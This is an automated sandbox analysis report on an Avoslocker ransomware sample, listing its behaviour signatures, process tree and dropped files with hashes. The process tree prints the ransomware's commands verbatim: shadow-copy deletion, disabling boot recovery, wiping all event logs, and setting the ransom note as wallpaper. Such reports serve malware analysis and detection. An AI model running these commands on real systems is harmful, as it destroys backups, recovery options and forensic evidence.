Resubmissions

16-03-2023 09:24

230316-ldhxdaab62 10

16-03-2023 09:12

230316-k56l3sab26 10

30-01-2023 14:58

230130-sb9ewaag73 9

30-01-2023 14:44

230130-r4m7nscd8s 9

13-01-2023 09:23

230113-lcgmxsfh22 9

Analysis

  • max time kernel
    60s
  • max time network
    36s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    16-03-2023 09:12

General

  • Target

    Roseland.exe

  • Size

    807KB

  • MD5

    19944159dfa94a1b75effd85e6b906dc

  • SHA1

    250acf87366f4c0cf91679a0e93dfc79954f0f10

  • SHA256

    bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705

  • SHA512

    c791840f59c2fc906c197c43e0e1717b9504cf46177a3688ecbd4937cdbf95349d68cc1e63649b85f02df4e6990c4df4756dd8267b062ea5271dd61fc3e508b0

  • SSDEEP

    12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYA7:u4s+oT+NXBLi0rjFXvyHBlbnCZa8

Malware Config

Signatures

  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Roseland.exe
    "C:\Users\Admin\AppData\Local\Temp\Roseland.exe"
    1⤵
    • Modifies extensions of user files
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Windows\system32\cmd.exe
      cmd /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2424
    • C:\Windows\system32\cmd.exe
      cmd /c vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1300
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:2112
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2460
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1740
    • C:\Windows\system32\cmd.exe
      cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1209476241.png /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:3392
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
        3⤵
          PID:3512
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2580

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\GET_YOUR_FILES_BACK.txt

      Filesize

      1011B

      MD5

      6d81ed40ba0a283e5483bfe6a448e9d7

      SHA1

      0c847a5f9df743b13e1aa11b4c24a4309e9a7119

      SHA256

      b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d

      SHA512

      8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

    • C:\Users\Admin\AppData\Local\Temp\1209476241.png

      Filesize

      32KB

      MD5

      1524411f3d6138062f1bd5ab5d31338c

      SHA1

      49292962485c61cf2307b139b494da8512a52916

      SHA256

      d5e0fa9b4d02e1225dff1af879333969f9245e8a2820a1635130ffccb6b27dd2

      SHA512

      ec8346d0c0b5ebcf171eb8aaf02d41ad3785f1a6c39c9e16ec9c84fd857ccd8d59f4ab69df5c1a919eb1248af2929b61cd9ca7292091ffb09352234b6c3c4c55

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      c9734dd629f10b384479160ed4046063

      SHA1

      4d98ef5d3cb709eaa6683d6c09c1c2317362b06b

      SHA256

      76c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1

      SHA512

      144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVFLMG0ZOJDG33R86VBG.temp

      Filesize

      7KB

      MD5

      c9734dd629f10b384479160ed4046063

      SHA1

      4d98ef5d3cb709eaa6683d6c09c1c2317362b06b

      SHA256

      76c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1

      SHA512

      144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17

    • C:\Users\GET_YOUR_FILES_BACK.txt

      Filesize

      1011B

      MD5

      6d81ed40ba0a283e5483bfe6a448e9d7

      SHA1

      0c847a5f9df743b13e1aa11b4c24a4309e9a7119

      SHA256

      b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d

      SHA512

      8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/2716-1422-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2716-1767-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2716-740-0x00000000023E0000-0x00000000023E8000-memory.dmp

      Filesize

      32KB

    • memory/2716-700-0x000000001B230000-0x000000001B512000-memory.dmp

      Filesize

      2.9MB

    • memory/2716-687-0x00000000024B0000-0x0000000002530000-memory.dmp

      Filesize

      512KB

    • memory/2900-24595-0x000000001B160000-0x000000001B442000-memory.dmp

      Filesize

      2.9MB

    • memory/2900-24597-0x0000000002290000-0x0000000002298000-memory.dmp

      Filesize

      32KB

    • memory/2900-24596-0x0000000002500000-0x0000000002580000-memory.dmp

      Filesize

      512KB

    • memory/2900-24598-0x0000000002500000-0x0000000002580000-memory.dmp

      Filesize

      512KB

    • memory/2900-24599-0x0000000002500000-0x0000000002580000-memory.dmp

      Filesize

      512KB

    • memory/2900-24601-0x0000000002500000-0x0000000002580000-memory.dmp

      Filesize

      512KB